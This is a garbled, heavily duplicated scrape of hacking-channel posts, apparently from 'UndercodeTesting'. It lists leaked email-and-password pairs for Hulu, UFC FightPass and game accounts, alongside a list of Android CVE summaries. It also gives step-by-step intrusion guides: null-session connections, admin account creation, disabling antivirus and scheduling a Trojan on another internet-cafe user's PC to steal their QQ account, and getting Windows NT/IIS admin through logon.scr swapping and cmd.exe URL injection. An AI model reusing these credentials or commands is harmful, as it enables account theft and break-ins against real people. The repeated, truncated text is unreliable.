makinapro13:davidpro69 | Level : 30 | BE : 2388 | RP : 98 | RefundsRemaining : 1 | emailVerified : true | ChampsCount : 43 | SkinsCount : 6 |
aurumr3k3r:raisha18 | Level : 16 | BE : 114 | RP : 0 | RefundsRemaining : 3 | emailVerified : true | ChampsCount : 16 | SkinsCount : 4 |
winampcz:Momadik125 | Level : 10 | BE : 3842 | RP : 140 | RefundsRemaining : 3 | emailVerified : true | ChampsCount : 1 | SkinsCount : 1 |
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Hulu Premium Accounts verified
erika_kristen@yahoo.com:Lotr1111 | Subscription: Hulu (No Ads) | Renewal: Billed using other service
erikaoneil7@yahoo.com:Fallebelle7 | Subscription: Hulu | Renewal: Billed using other service
erivers@scwhitmoreschool.org:kp7tr9?? | Subscription: Hulu | Renewal: Billed using other service
ernt3563@gmail.com:Mdigt07? | : Subscription: Hulu + Live TV | Renewal: Billed using other service
escoon13@icloud.com:Cooner8384 | Subscription: Hulu | Renewal: Billed using other service
estamand7@yahoo.com:auntemhc | Subscription: Hulu | Renewal: Billed using other service
escoon13@icloud.com:Cooner8384 | Subscription: Hulu | Renewal: Billed using other service
eureke_15@yahoo.com:love2531 | Subscription: Hulu (No Ads) | Renewal: Billed using other service
eymonge@gmail.com:Jj1107 | : Subscription: Hulu | Renewal: Billed using other service
ewella_21@hotmail.com:35Dolloff* | Subscription: Hulu | Renewal: Billed using other service
fayjd@hotmail.com:michael1 | : Subscription: Hulu | Renewal: Billed using other service
fieldofdreams_8@yahoo.com:Hallee16 | Subscription: Hulu | Renewal: Billed using other service
ferrucci1515@yahoo.com:11johnnyjr | Subscription: Hulu | Renewal: Billed using other service
flyfsh33@gmail.com:Summer@15! | Subscription: Hulu + Live TV | Renewal: Billed using other service
Fireguys_girl_2004@yahoo.com:HTL020313! | Subscription: Hulu | Renewal: Billed using other service
frederickson.robyn@gmail.com:Gabebabe15 | Subscription: Hulu | Renewal: Billed using other service
lgfarhadi@gmail.com:108Coldwater | Subscription: Hulu (No Ads) | Renewal: Billed using other service
leslie.ashleyk@gmail.com:Kyla51412 | Subscription: Hulu (No Ads) |
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Hulu Premium Accounts verified
erika_kristen@yahoo.com:Lotr1111 | Subscription: Hulu (No Ads) | Renewal: Billed using other service
erikaoneil7@yahoo.com:Fallebelle7 | Subscription: Hulu | Renewal: Billed using other service
erivers@scwhitmoreschool.org:kp7tr9?? | Subscription: Hulu | Renewal: Billed using other service
ernt3563@gmail.com:Mdigt07? | : Subscription: Hulu + Live TV | Renewal: Billed using other service
escoon13@icloud.com:Cooner8384 | Subscription: Hulu | Renewal: Billed using other service
estamand7@yahoo.com:auntemhc | Subscription: Hulu | Renewal: Billed using other service
escoon13@icloud.com:Cooner8384 | Subscription: Hulu | Renewal: Billed using other service
eureke_15@yahoo.com:love2531 | Subscription: Hulu (No Ads) | Renewal: Billed using other service
eymonge@gmail.com:Jj1107 | : Subscription: Hulu | Renewal: Billed using other service
ewella_21@hotmail.com:35Dolloff* | Subscription: Hulu | Renewal: Billed using other service
fayjd@hotmail.com:michael1 | : Subscription: Hulu | Renewal: Billed using other service
fieldofdreams_8@yahoo.com:Hallee16 | Subscription: Hulu | Renewal: Billed using other service
ferrucci1515@yahoo.com:11johnnyjr | Subscription: Hulu | Renewal: Billed using other service
flyfsh33@gmail.com:Summer@15! | Subscription: Hulu + Live TV | Renewal: Billed using other service
Fireguys_girl_2004@yahoo.com:HTL020313! | Subscription: Hulu | Renewal: Billed using other service
frederickson.robyn@gmail.com:Gabebabe15 | Subscription: Hulu | Renewal: Billed using other service
lgfarhadi@gmail.com:108Coldwater | Subscription: Hulu (No Ads) | Renewal: Billed using other service
leslie.ashleyk@gmail.com:Kyla51412 | Subscription: Hulu (No Ads) |
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ ANDROID BUGS - CVE DETAILED LIST 2020 :
1) CVE-2019-14783 264 2019-08-08 2019-09-25 2.1 None Local Low Not required None Partial None
On Samsung mobile devices with N(7.x), and O(8.x), P(9.0) software, FotaAgent allows a malicious application to create privileged files. The Samsung ID is SVE-2019-14764.
2) CVE-2019-9506 310 2019-08-14 2019-08-28 4.8 None Local Network Low Not required Partial Partial None
The Bluetooth BR/EDR specification up to and including version 5.1 permits sufficiently low encryption key length and does not prevent an attacker from influencing the key length negotiation. This allows practical brute-force attacks (aka "KNOB") that can decrypt traffic and inject arbitrary ciphertext without the victim noticing.
3) CVE-2019-9463 269 Bypass 2019-09-27 2019-10-03 4.4 None Local Medium Not required Partial Partial Partial
In Platform, there is a possible bypass of user interaction requirements due to background app interception. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: AndroidVersions: Android-10Android ID: A-113584607
4) CVE-2019-9462 125 DoS 2019-09-27 2019-09-30 5.0 None Remote Low Not required None None Partial
In Bluetooth, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Product: AndroidVersions: Android-10Android ID: A-91544774
5) CVE-2019-9461 200 +Info 2019-09-06 2019-09-09 7.8 None Remote Low Not required Complete None None
In the Android kernel in VPN routing there is a possible information disclosure. This could lead to remote information disclosure by an adjacent network attacker with no additional execution privileges needed. User interaction is not needed for exploitation.
6) CVE-2019-9460 787 2019-09-27 2019-10-02 4.6 None Local Low Not required Partial Partial Partial
In mediaserver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: AndroidVersions: Android-10Android ID: A-62535446
7) CVE-2019-9459 120 Overflow 2019-09-27 2019-09-30 7.5 None Remote Low Not required Partial Partial Partial
In libttspico, there is a possible OOB write due to a heap buffer overflow. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: AndroidVersions: Android-10Android ID: A-79593569
8) CVE-2019-9458 362 2019-09-06 2019-09-09 4.4 None Local Medium Not required Partial Partial Partial
In the Android kernel in the video driver there is a use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
9) CVE-2019-9456 787 2019-09-06 2019-09-24 4.6 None Local Low Not required Partial Partial Partial
In the Android kernel in Pixel C USB monitor driver there is a possible OOB write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.
10) CVE-2019-9455 200 +Info 2019-09-06 2019-09-09 2.1 None Local Low Not required Partial None None
In the Android kernel in the video driver there is a kernel pointer leak due to a WARN_ON statement. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.
π¦ ANDROID BUGS - CVE DETAILED LIST 2020 :
1) CVE-2019-14783 264 2019-08-08 2019-09-25 2.1 None Local Low Not required None Partial None
On Samsung mobile devices with N(7.x), and O(8.x), P(9.0) software, FotaAgent allows a malicious application to create privileged files. The Samsung ID is SVE-2019-14764.
2) CVE-2019-9506 310 2019-08-14 2019-08-28 4.8 None Local Network Low Not required Partial Partial None
The Bluetooth BR/EDR specification up to and including version 5.1 permits sufficiently low encryption key length and does not prevent an attacker from influencing the key length negotiation. This allows practical brute-force attacks (aka "KNOB") that can decrypt traffic and inject arbitrary ciphertext without the victim noticing.
3) CVE-2019-9463 269 Bypass 2019-09-27 2019-10-03 4.4 None Local Medium Not required Partial Partial Partial
In Platform, there is a possible bypass of user interaction requirements due to background app interception. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: AndroidVersions: Android-10Android ID: A-113584607
4) CVE-2019-9462 125 DoS 2019-09-27 2019-09-30 5.0 None Remote Low Not required None None Partial
In Bluetooth, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Product: AndroidVersions: Android-10Android ID: A-91544774
5) CVE-2019-9461 200 +Info 2019-09-06 2019-09-09 7.8 None Remote Low Not required Complete None None
In the Android kernel in VPN routing there is a possible information disclosure. This could lead to remote information disclosure by an adjacent network attacker with no additional execution privileges needed. User interaction is not needed for exploitation.
6) CVE-2019-9460 787 2019-09-27 2019-10-02 4.6 None Local Low Not required Partial Partial Partial
In mediaserver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: AndroidVersions: Android-10Android ID: A-62535446
7) CVE-2019-9459 120 Overflow 2019-09-27 2019-09-30 7.5 None Remote Low Not required Partial Partial Partial
In libttspico, there is a possible OOB write due to a heap buffer overflow. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: AndroidVersions: Android-10Android ID: A-79593569
8) CVE-2019-9458 362 2019-09-06 2019-09-09 4.4 None Local Medium Not required Partial Partial Partial
In the Android kernel in the video driver there is a use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
9) CVE-2019-9456 787 2019-09-06 2019-09-24 4.6 None Local Low Not required Partial Partial Partial
In the Android kernel in Pixel C USB monitor driver there is a possible OOB write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.
10) CVE-2019-9455 200 +Info 2019-09-06 2019-09-09 2.1 None Local Low Not required Partial None None
In the Android kernel in the video driver there is a kernel pointer leak due to a WARN_ON statement. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.
11) CVE-2019-9454 787 Mem. Corr. 2019-09-06 2019-09-09 4.6 None Local Low Not required Partial Partial Partial
In the Android kernel in i2c driver there is a possible out of bounds write due to memory corruption. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.
12) CVE-2019-9453 20 2019-09-06 2019-09-09 2.1 None Local Low Not required Partial None None
In the Android kernel in F2FS touch driver there is a possible out of bounds read due to improper input validation. This could lead to local information disclosure with system execution privileges needed. User interaction is not needed for exploitation.
13) CVE-2019-9452 125 2019-09-06 2019-09-09 2.1 None Local Low Not required Partial None None
In the Android kernel in SEC_TS touch driver there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.
14) CVE-2019-9451 787 2019-09-06 2019-09-10 4.6 None Local Low Not required Partial Partial Partial
In the Android kernel in the touchscreen driver there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.
15) CVE-2019-9450 362 Mem. Corr. 2019-09-06 2019-09-10 4.4 None Local Medium Not required Partial Partial Partial
In the Android kernel in the FingerTipS touchscreen driver there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.
16) CVE-2019-9449 125 2019-09-06 2019-09-09 2.1 None Local Low Not required Partial None None
In the Android kernel in FingerTipS touchscreen driver there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with system execution privileges needed. User interaction is not needed for exploitation.
17) CVE-2019-9448 787 2019-09-06 2019-09-09 4.6 None Local Low Not required Partial Partial Partial
In the Android kernel in the FingerTipS touchscreen driver there is a possible out of bounds write due to a missing bounds check. This could lead to a local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.
18) CVE-2019-9447 416 2019-09-06 2019-09-09 4.6 None Local Low Not required Partial Partial Partial
In the Android kernel in the FingerTipS touchscreen driver there is a possible use-after-free due to improper locking. This could lead to a local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.
19) CVE-2019-9446 787 2019-09-06 2019-09-09 4.6 None Local Low Not required Partial Partial Partial
In the Android kernel in the FingerTipS touchscreen driver there is a possible out of bounds write due to improper input validation. This could lead to a local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.
20) CVE-2019-9445 125 2019-09-06 2019-09-09 2.1 None Local Low Not required Partial None None
In the Android kernel in F2FS driver there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with system execution privileges needed. User interaction is not needed for exploitation.
In the Android kernel in i2c driver there is a possible out of bounds write due to memory corruption. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.
12) CVE-2019-9453 20 2019-09-06 2019-09-09 2.1 None Local Low Not required Partial None None
In the Android kernel in F2FS touch driver there is a possible out of bounds read due to improper input validation. This could lead to local information disclosure with system execution privileges needed. User interaction is not needed for exploitation.
13) CVE-2019-9452 125 2019-09-06 2019-09-09 2.1 None Local Low Not required Partial None None
In the Android kernel in SEC_TS touch driver there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.
14) CVE-2019-9451 787 2019-09-06 2019-09-10 4.6 None Local Low Not required Partial Partial Partial
In the Android kernel in the touchscreen driver there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.
15) CVE-2019-9450 362 Mem. Corr. 2019-09-06 2019-09-10 4.4 None Local Medium Not required Partial Partial Partial
In the Android kernel in the FingerTipS touchscreen driver there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.
16) CVE-2019-9449 125 2019-09-06 2019-09-09 2.1 None Local Low Not required Partial None None
In the Android kernel in FingerTipS touchscreen driver there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with system execution privileges needed. User interaction is not needed for exploitation.
17) CVE-2019-9448 787 2019-09-06 2019-09-09 4.6 None Local Low Not required Partial Partial Partial
In the Android kernel in the FingerTipS touchscreen driver there is a possible out of bounds write due to a missing bounds check. This could lead to a local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.
18) CVE-2019-9447 416 2019-09-06 2019-09-09 4.6 None Local Low Not required Partial Partial Partial
In the Android kernel in the FingerTipS touchscreen driver there is a possible use-after-free due to improper locking. This could lead to a local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.
19) CVE-2019-9446 787 2019-09-06 2019-09-09 4.6 None Local Low Not required Partial Partial Partial
In the Android kernel in the FingerTipS touchscreen driver there is a possible out of bounds write due to improper input validation. This could lead to a local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.
20) CVE-2019-9445 125 2019-09-06 2019-09-09 2.1 None Local Low Not required Partial None None
In the Android kernel in F2FS driver there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with system execution privileges needed. User interaction is not needed for exploitation.
21) CVE-2019-9444 200 +Info 2019-09-06 2019-09-09 2.1 None Local Low Not required Partial None None
In the Android kernel in sync debug fs driver there is a kernel pointer leak due to the usage of printf with %p. This could lead to local information disclosure with system execution privileges needed. User interaction is not needed for exploitation.
22) CVE-2019-9443 264 Bypass 2019-09-06 2019-09-09 4.6 None Local Low Not required Partial Partial Partial
In the Android kernel in the vl53L0 driver there is a possible out of bounds write due to a permissions bypass. This could lead to local escalation of privilege due to a set_fs() call without restoring the previous limit with System execution privileges needed. User interaction is not needed for exploitation.
23) CVE-2019-9442 416 Mem. Corr. 2019-09-06 2019-09-09 4.6 None Local Low Not required Partial Partial Partial
In the Android kernel in the mnh driver there is possible memory corruption due to a use after free. This could lead to local escalation of privilege with System privileges required. User interaction is not needed for exploitation.
24) CVE-2019-9441 787 2019-09-06 2019-09-09 4.6 None Local Low Not required Partial Partial Partial
In the Android kernel in the mnh driver there is a possible out of bounds write due to improper input validation. This could lead to escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.
25) CVE-2019-9440 610 2019-09-27 2019-10-04 2.1 None Local Low Not required Partial None None
In AOSP Email, there is a possible information disclosure due to a confused deputy. This could lead to local disclosure of the Email app's protected files with User execution privileges needed. User interaction is needed for exploitation. Product: AndroidVersions: Android-10Android ID: A-37637796
26) CVE-2019-9438 610 2019-09-27 2019-10-03 2.1 None Local Low Not required Partial None None
In the Package Manager service, there is a possible information disclosure due to a confused deputy. This could lead to local disclosure of information about installed packages for other users with no additional execution privileges needed. User interaction is not needed for exploitation. Product: AndroidVersions: Android-10Android ID: A-77821568
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
In the Android kernel in sync debug fs driver there is a kernel pointer leak due to the usage of printf with %p. This could lead to local information disclosure with system execution privileges needed. User interaction is not needed for exploitation.
22) CVE-2019-9443 264 Bypass 2019-09-06 2019-09-09 4.6 None Local Low Not required Partial Partial Partial
In the Android kernel in the vl53L0 driver there is a possible out of bounds write due to a permissions bypass. This could lead to local escalation of privilege due to a set_fs() call without restoring the previous limit with System execution privileges needed. User interaction is not needed for exploitation.
23) CVE-2019-9442 416 Mem. Corr. 2019-09-06 2019-09-09 4.6 None Local Low Not required Partial Partial Partial
In the Android kernel in the mnh driver there is possible memory corruption due to a use after free. This could lead to local escalation of privilege with System privileges required. User interaction is not needed for exploitation.
24) CVE-2019-9441 787 2019-09-06 2019-09-09 4.6 None Local Low Not required Partial Partial Partial
In the Android kernel in the mnh driver there is a possible out of bounds write due to improper input validation. This could lead to escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.
25) CVE-2019-9440 610 2019-09-27 2019-10-04 2.1 None Local Low Not required Partial None None
In AOSP Email, there is a possible information disclosure due to a confused deputy. This could lead to local disclosure of the Email app's protected files with User execution privileges needed. User interaction is needed for exploitation. Product: AndroidVersions: Android-10Android ID: A-37637796
26) CVE-2019-9438 610 2019-09-27 2019-10-03 2.1 None Local Low Not required Partial None None
In the Package Manager service, there is a possible information disclosure due to a confused deputy. This could lead to local disclosure of information about installed packages for other users with no additional execution privileges needed. User interaction is not needed for exploitation. Product: AndroidVersions: Android-10Android ID: A-77821568
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ UFC FightPass Premium Accounts :
chikicolon@gmail.com:6 (chikicolon@gmail.com:6)chiqui6 | Premium
kyleandjenna@gmail.com:annejm | : Premium
mickley_sw@hotmail.com:Phatn355 | Premium
frankskrobot@gmail.com:Avery2011 | Premium
colebeason2@live.com:charlet13 | Premium
kzidni@yahoo.com:Pokese1234 | Premium
thierry.stpl@gmail.com:Fucker99 | Premium
campbellconnor81@gmail.com:connor35 | Premium
snoormurray@icloud.com:Boxing33 | Premium
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ UFC FightPass Premium Accounts :
chikicolon@gmail.com:6 (chikicolon@gmail.com:6)chiqui6 | Premium
kyleandjenna@gmail.com:annejm | : Premium
mickley_sw@hotmail.com:Phatn355 | Premium
frankskrobot@gmail.com:Avery2011 | Premium
colebeason2@live.com:charlet13 | Premium
kzidni@yahoo.com:Pokese1234 | Premium
thierry.stpl@gmail.com:Fucker99 | Premium
campbellconnor81@gmail.com:connor35 | Premium
snoormurray@icloud.com:Boxing33 | Premium
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Commands and techniques used for Internet cafe intrusion :
t.me/undercodeTesting
There are many Internet cafe management software, but most of them have one or other loopholes, so a lot of cracking techniques for Internet cafe software and Internet cafe software have emerged. You can surf the Internet for free, you can use the "command prompt" method, you can use administrator permissions, and so on. As a result, Internet cafes have become the most serious places for loss of virtual property.
> But as long as the level of the Internet cafe administrator is sufficient, this situation can be avoided. Let me tell you how I used to get the MMQQ number in Internet cafes. It's a bit complicated. The hacker base is mainly to let you know some commands used during hacking.
π¦ ππΌπ' π πππΈβπ :
1) The first step: first determine the IP of the computer used by the MM. The number and IP address of the computer in the Internet cafe are usually the same or higher. For example, the computer with the number 20 in the Internet cafe is generally 192.168.0.20 or 192.168.0.21 (192.168 .0.1 is left to the router), not only that, the machine name is also regular, the machine name of computer 20 is usually Wangba20, so as long as you know the computer used by MM, and then enter the "command prompt", Ping Wangba20 can get the IP address , Such as 192.168.0.20.
2) With the IP, you can start to connect to the MM computer. Because the computers in the Internet cafe mostly use unpatched Windows 2000, and the user name for logging in to the computer is mostly an empty password in the form of "user number" Form, so at the "command prompt", enter net use //192.168.0.20/ipc$ "" / user: "" and net use //192.168.0.20/ipc$ "" / user: "user20" to establish a connection .
3) After the connection is successful, you must close the anti-virus software on the other computer, right-click "My Computer", select "Management", right-click "Computer Management (Local)" in the pop-up window, and select "Connect to another computer ", Connect to 192.168.0.20, start the" Telnet "service (" Computer Management "can directly manage remote computers).
3) Enter two commands under the "Command Prompt" to create a new user20 user on this machine and add it to the administrator group.
net user user20 / add
net localgroup administrators user20 / add
4) Go to C: \ Winnt \ System32, right-click CMD.EXE, select "Create Shortcut", then right-click the newly created shortcut, select "Properties", check "Run as other user" (to Run the program as another user). Run the shortcut CMD, after the "Run as other user" window pops up, enter "user20" and press Enter.
5) Use telnet 192.168.0.20 to log in to the MM computer, and then download a command-line killing software from the Internet, such as knlps, etc., and close the anti-virus software process on telnet.
6) You can download a Trojan now, and use the "copy Trojan name.exe //192.168.0.20/admin$" method to copy the Trojan to the MM computer. Then use net time //192.168.0.20 to get the time of the MM computer, for example, 4 pm, and finally use "at //192.168.0.20 time Trojan name.exe", such as "at //192.168.0.20 16:02 Trojan name The .exe "command runs the Trojan at the specified time.
With the Trojan, you can naturally know the QQ number used by MM.
How about it, is it dangerous in Internet cafes? However, you can rest assured that not all Internet cafes are like this. Most Internet cafes are still very safe. As long as you use QQ or other software, you can select "Internet cafe mode" (Click "Login Mode" option appears after "Advanced Settings".
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Commands and techniques used for Internet cafe intrusion :
t.me/undercodeTesting
There are many Internet cafe management software, but most of them have one or other loopholes, so a lot of cracking techniques for Internet cafe software and Internet cafe software have emerged. You can surf the Internet for free, you can use the "command prompt" method, you can use administrator permissions, and so on. As a result, Internet cafes have become the most serious places for loss of virtual property.
> But as long as the level of the Internet cafe administrator is sufficient, this situation can be avoided. Let me tell you how I used to get the MMQQ number in Internet cafes. It's a bit complicated. The hacker base is mainly to let you know some commands used during hacking.
π¦ ππΌπ' π πππΈβπ :
1) The first step: first determine the IP of the computer used by the MM. The number and IP address of the computer in the Internet cafe are usually the same or higher. For example, the computer with the number 20 in the Internet cafe is generally 192.168.0.20 or 192.168.0.21 (192.168 .0.1 is left to the router), not only that, the machine name is also regular, the machine name of computer 20 is usually Wangba20, so as long as you know the computer used by MM, and then enter the "command prompt", Ping Wangba20 can get the IP address , Such as 192.168.0.20.
2) With the IP, you can start to connect to the MM computer. Because the computers in the Internet cafe mostly use unpatched Windows 2000, and the user name for logging in to the computer is mostly an empty password in the form of "user number" Form, so at the "command prompt", enter net use //192.168.0.20/ipc$ "" / user: "" and net use //192.168.0.20/ipc$ "" / user: "user20" to establish a connection .
3) After the connection is successful, you must close the anti-virus software on the other computer, right-click "My Computer", select "Management", right-click "Computer Management (Local)" in the pop-up window, and select "Connect to another computer ", Connect to 192.168.0.20, start the" Telnet "service (" Computer Management "can directly manage remote computers).
3) Enter two commands under the "Command Prompt" to create a new user20 user on this machine and add it to the administrator group.
net user user20 / add
net localgroup administrators user20 / add
4) Go to C: \ Winnt \ System32, right-click CMD.EXE, select "Create Shortcut", then right-click the newly created shortcut, select "Properties", check "Run as other user" (to Run the program as another user). Run the shortcut CMD, after the "Run as other user" window pops up, enter "user20" and press Enter.
5) Use telnet 192.168.0.20 to log in to the MM computer, and then download a command-line killing software from the Internet, such as knlps, etc., and close the anti-virus software process on telnet.
6) You can download a Trojan now, and use the "copy Trojan name.exe //192.168.0.20/admin$" method to copy the Trojan to the MM computer. Then use net time //192.168.0.20 to get the time of the MM computer, for example, 4 pm, and finally use "at //192.168.0.20 time Trojan name.exe", such as "at //192.168.0.20 16:02 Trojan name The .exe "command runs the Trojan at the specified time.
With the Trojan, you can naturally know the QQ number used by MM.
How about it, is it dangerous in Internet cafes? However, you can rest assured that not all Internet cafes are like this. Most Internet cafes are still very safe. As long as you use QQ or other software, you can select "Internet cafe mode" (Click "Login Mode" option appears after "Advanced Settings".
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Method skills for extracting administrator rights by undercode :
let s use this tutorial on winxp or vista :
t.me/undercodeTesting
π¦ ππΌπ' π πππΈβπ :
If you have a normal user account, then there is a very simple way to get the NT Administrator account:
1) First rename logon.scr under c: winntsystem32 to logon.old backup
2) Then rename usrmgr.exe to logon.scr
3) Then restart
logon.scr is a program loaded at startup.After restarting, the previous login password input interface will not appear, but the user manager
4) At this time he has the authority to add himself to the Administrator group
Don't forget to change the file name back!
of two:
The following technology is suitable for websites that do not pay much attention to NT network security. Although it depends on luck, the technology of more people and more powerful http can also be used by higher-level personnel
π¦ As a beginner, entering the NT network can take the following steps:
Because NT's IIS server's ftp generally allows anonymous accounts to enter, some anonymous accounts have upload permissions, we will attack such sites. Because if anonymous accounts are not allowed, it may cause clear text passwords to be transmitted online. These passwords can be intercepted with the tool of tcpspy. Now I will not talk about these more advanced technologies.
It is because of the setting that allows anonymous account ftp login, it also brings us the opportunity to break through the NT server. We use ftp to log in to an NT server, for example: www.xxx.com (example name):
as example site :
ftp www.xxx.com
Connected to www.xxx.com
220 ntsvr2 Microsoft FTP Service (Version 3.0).
ntsvr2 exposes its NETbios name, then in the context of IIS, there must be an IUSER_ntsvr2 user account, belonging to the Domain user group, this account we will use to obtain Administrator permissions
User (www.xxx.com:(none
))
: anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: enter guest @ or guest
For administrators who lack network security knowledge, many people do not ban the guest account or set a password.
Then the guest account is an available correct user account, although it only belongs to the Domain guest group. In this case, we can enter the FTP of the NT server.
After entering, try cd / c, if you are lucky, and change the directory successfully, then you have 80% certainty.
Now, start looking for the cgi-bin directory (or scripts directory), after entering, copy cmd.exe under winnt to cgi-bin, upload getadmin and gasys.dll to cgi-bin and enter: http: // www. xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN
After about ten seconds, the screen displays:
CGI Error
At this time, there is a 90% possibility that you have upgraded IUSER_ntsvr2 to Administrator, that is, anyone who accesses the web site is an administrator. You can add user:
http://www.xxx.com/cgi-bin/cmd .exe? / c% 20c: winntsystem32net.exe% 20user% 20china% 20news% 20 / add
π¦ This creates a user called china, whose password is news, and then:
http://www.xxx.com/cgi-bin/getadmin.exe?cnn
You can log in with the account of cnn, you can change the homepage of the web root directory, or you can directly modify it using the above cmd.exe method
Third:
Scan with NT's Netbios technology
nbtstat -a www.xxx.com
or
nbtstat -A www.xxx.com
This can get the shared resource name of its domain
net view \ www.xxx.com
You can get the shared resource name of its machine, if there is a c drive
net use f: \ www.xxx.com \ c $ Content $ nbsp;
You can use f: to map its c drive
net use \ 111.111.111.111 \ ipc $ Content $ nbsp; "" / user: ""
Fourth: Ported tools under Unix:
Windows xp example users can use this tcp / ip tool to capture packets in tcp / ip connection:
WinDumpxp.exe still needs to download this library Packet95.exe before use
Windows NT user version
WinDump.exe PacketNT.exe
(can try on win vist /xp/7 old v)
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Method skills for extracting administrator rights by undercode :
let s use this tutorial on winxp or vista :
t.me/undercodeTesting
π¦ ππΌπ' π πππΈβπ :
If you have a normal user account, then there is a very simple way to get the NT Administrator account:
1) First rename logon.scr under c: winntsystem32 to logon.old backup
2) Then rename usrmgr.exe to logon.scr
3) Then restart
logon.scr is a program loaded at startup.After restarting, the previous login password input interface will not appear, but the user manager
4) At this time he has the authority to add himself to the Administrator group
Don't forget to change the file name back!
of two:
The following technology is suitable for websites that do not pay much attention to NT network security. Although it depends on luck, the technology of more people and more powerful http can also be used by higher-level personnel
π¦ As a beginner, entering the NT network can take the following steps:
Because NT's IIS server's ftp generally allows anonymous accounts to enter, some anonymous accounts have upload permissions, we will attack such sites. Because if anonymous accounts are not allowed, it may cause clear text passwords to be transmitted online. These passwords can be intercepted with the tool of tcpspy. Now I will not talk about these more advanced technologies.
It is because of the setting that allows anonymous account ftp login, it also brings us the opportunity to break through the NT server. We use ftp to log in to an NT server, for example: www.xxx.com (example name):
as example site :
ftp www.xxx.com
Connected to www.xxx.com
220 ntsvr2 Microsoft FTP Service (Version 3.0).
ntsvr2 exposes its NETbios name, then in the context of IIS, there must be an IUSER_ntsvr2 user account, belonging to the Domain user group, this account we will use to obtain Administrator permissions
User (www.xxx.com:(none
))
: anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: enter guest @ or guest
For administrators who lack network security knowledge, many people do not ban the guest account or set a password.
Then the guest account is an available correct user account, although it only belongs to the Domain guest group. In this case, we can enter the FTP of the NT server.
After entering, try cd / c, if you are lucky, and change the directory successfully, then you have 80% certainty.
Now, start looking for the cgi-bin directory (or scripts directory), after entering, copy cmd.exe under winnt to cgi-bin, upload getadmin and gasys.dll to cgi-bin and enter: http: // www. xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN
After about ten seconds, the screen displays:
CGI Error
At this time, there is a 90% possibility that you have upgraded IUSER_ntsvr2 to Administrator, that is, anyone who accesses the web site is an administrator. You can add user:
http://www.xxx.com/cgi-bin/cmd .exe? / c% 20c: winntsystem32net.exe% 20user% 20china% 20news% 20 / add
π¦ This creates a user called china, whose password is news, and then:
http://www.xxx.com/cgi-bin/getadmin.exe?cnn
You can log in with the account of cnn, you can change the homepage of the web root directory, or you can directly modify it using the above cmd.exe method
Third:
Scan with NT's Netbios technology
nbtstat -a www.xxx.com
or
nbtstat -A www.xxx.com
This can get the shared resource name of its domain
net view \ www.xxx.com
You can get the shared resource name of its machine, if there is a c drive
net use f: \ www.xxx.com \ c $ Content $ nbsp;
You can use f: to map its c drive
net use \ 111.111.111.111 \ ipc $ Content $ nbsp; "" / user: ""
Fourth: Ported tools under Unix:
